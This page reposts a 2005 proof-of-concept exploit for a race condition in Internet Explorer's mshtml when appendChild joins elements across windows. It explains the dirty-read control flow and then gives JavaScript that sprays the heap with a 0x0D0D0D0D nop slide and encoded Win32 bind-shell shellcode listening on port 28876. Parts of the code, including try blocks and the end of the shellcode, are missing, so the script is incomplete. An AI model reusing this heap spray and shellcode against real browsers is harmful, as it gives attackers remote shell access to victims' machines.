Exploit Microsoft Internet Explorer - DHTML Object Memory Corruption


18 Дек 2022
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    ,sSSSs,   Ss,       Internet Exploiter 2 v0.1
   SS"  `YS'   '*Ss.    MSIE R6025 Multithreading issue PoC exploit
  iS'            ,SS"   Copyright (C) 2003, 2004 by Berend-Jan Wever.
  YS,  .ss    ,sY"      http://www.edup.tudelft.nl/~bjwever
  `"YSSP"   sSS         <[email protected]>

  This program is free software; you can redistribute it and/or modify it under
  the terms of the GNU General Public License version 2, 1991 as published by
  the Free Software Foundation.

  This program is distributed in the hope that it will be useful, but WITHOUT
  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more

  A copy of the GNU General Public License can be found at:
  or you can write to:
    Free Software Foundation, Inc.
    59 Temple Place - Suite 330
    Boston, MA  02111-1307

  The vulnerability:
  There is a race condition when using appendChild to append an element in one
  window to an element in another. A "dirty" read can be exploited to gain
  control over the process. The control can be gained because of this code:

  MSHTML.DLL @ 0x635F6074 (win2ksp4en)
  MOV     EAX, DWORD PTR [ESP+4]  ; EAX = Some pointer to the heap for mshtml
  MOV     EAX, DWORD PTR [EAX]    ; EAX = "dirty" value from heap
  JMP     NEAR DWORD PTR [EAX+8]  ; Jmp to memory pointed to by "dirty" value

  This is how we exploit it:
  - To get some control over the "dirty" value we try to "spray" the heap for
    mshtml with the value we want it to read. This is done with creatComment()s
    that contain a string full of our value. We want to spray effectve and
    fast, so we use as big a string as possible. If we use a string over 512
    bytes long, mshtml will write a pointer to the string instead of the string
  - To jump to the right address, we have to make sure that the "dirty" value
    points to a pointer that in turn points to the address we want to jump to.

  The first part of the exploit will provide for all this in creating a
  number of dwords around 0x0D0D0D0D that all point to 0x0D0D0D0D. So if we
  "spray" the heap for mshtml with 0x0D0D0D0D, this is what will happen:

  MSHTML.DLL @ 0x635F6074 (win2ksp4en)
  MOV     EAX, DWORD PTR [ESP+4]  ; EAX = Some pointer to the heap fot mshtml
  MOV     EAX, DWORD PTR [EAX]    ; EAX = 0x0D0D0D0D
  JMP     NEAR DWORD PTR [EAX+8]  ; JMP [0x0D0D0D15] = JMP 0x0D0D0D0D
  HEAP @ 0x0D0D0D0D
  OR      EAX, 0x0D0D0D0D
  OR      EAX, 0x0D0D0D0D
  OR      EAX, 0x0D0D0D0D

  This has proven to work quite reliable. Allthough testing showed that there
  is a chance we do not control the "dirty" value. In this case, the "dirty"
  value seems to be 0x11CF03f9 a lot of the time, so we make sure we cover
  that address with the '0D' nopslide-landingzone too.

    <SCRIPT id="SkyLined" language="javascript">
        sMSHTML_heap_spray = unescape("%u0D0D%u0D0D");
        for (i=0; i<7; i++) // 512 bytes
            sMSHTML_heap_spray += sMSHTML_heap_spray;
        try {
            // We need to have an element in another window, so we try to create
            // one in the window that opened us. This will most likely fail
            // the first time because of XSS restrictions. In that case we open
            // this page in a new window and try again from there.
        } catch(e) {
            // both open() and showHelp() work with this

        function exploit(parent_element) {
            // cosmetics, this window will DIE, so we move it out of view.
            window.moveTo(100000, 100000);

            iHeap_fill_to_address = 0x12000000;
            sHeap_return_address = unescape("%u0D0D%u0D0D");

            // 4 nops because the 0x0D slide has 5 byte instructions.
            sShellcode = unescape("%u3737%u3737" +
                // Win32 bindshell (port 28876, '\0' free, looping). Thanks to
                // HDM and others for inspiration and borrowed code. Source:
                // www.edup.tudelft.nl/~bjwever/shellcode/w32_bind_0free_loop.c
                "%u43eb"+"%u5756"+"%u458b"+"%u8b3c"+"%u0554"+"%u0178"+"%u52ea" +
                "%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf" +
                "%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b" +
                "%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64" +
                "%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850" +
                "%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff" +
                "%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22" +
                "%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6" +
                "%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe" +
                "%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031" +
                "%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56" +
                "%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964" +
                "%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353" +
                "%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343" +
                "%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031" +
                "%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b" +
            // We are going to create a large block the will contain:
            // [heap header][nopslide...........................][shellcode]
            // by creating an array with a number of large strings that contain
            // the nopslide and the shellcode. We will do this in such a way that
            // one heap block is allocated for every string (by making it at least
            // 0x80000 bytes) and try to use every byte of the heap block by making
            // the nopslide fill the area between the heap header and shellcode
            // precisely.
            // Size of the header of heap blocks in MSIE in bytes:
            iHeap_header_size = 0x38; // Actually it's 0x24, but this value works better
            // Size of the blocks we want to create in bytes:
            iHeap_block_size = 0x400000;
            // Size of the shellcode in bytes:
            iShellcode_size = sShellcode.length * 2; // (convert dwords to bytes)
            // From this we can calculate the size of the nopslide in bytes:
            iNopslide_size = iHeap_block_size - (iHeap_header_size + iShellcode_size);
            // The quickest way to create large blocks of memory is doubling their
            // size untill they are big enough (or too big, in which case we cut
            // them back to size.)
            sNopslide = sHeap_return_address;
            while (sNopslide.length*2<iNopslide_size) sNopslide+=sNopslide;
            sNopslide = sNopslide.substring(0, iNopslide_size/2);
            // And now we can combine the nopslide and shellcode to create the heap
            // blocks, we'll create enough to make sure we've got one at the
            // desired return address: If we could calculate where the first one
            // will be allocated, we could create exactly enough blocks, for now
            // we assume they won't start under 0x400000 so we make sure we
            // create enough for that value.
            iHeap_block_count = (iHeap_fill_to_address-0x400000) / iHeap_block_size;
            memory = new Array();
            for (i=0;i<iHeap_block_count;i++) memory[i] = sNopslide + sShellcode;

            sMSHTML_heap_spray = sNopslide.substring(0, 0x100); // 0x100 dwords = 512 bytez
            for(i=0;i<1024;i++) try {
            } catch (e) { }

# milw0rm.com [2005-04-12]

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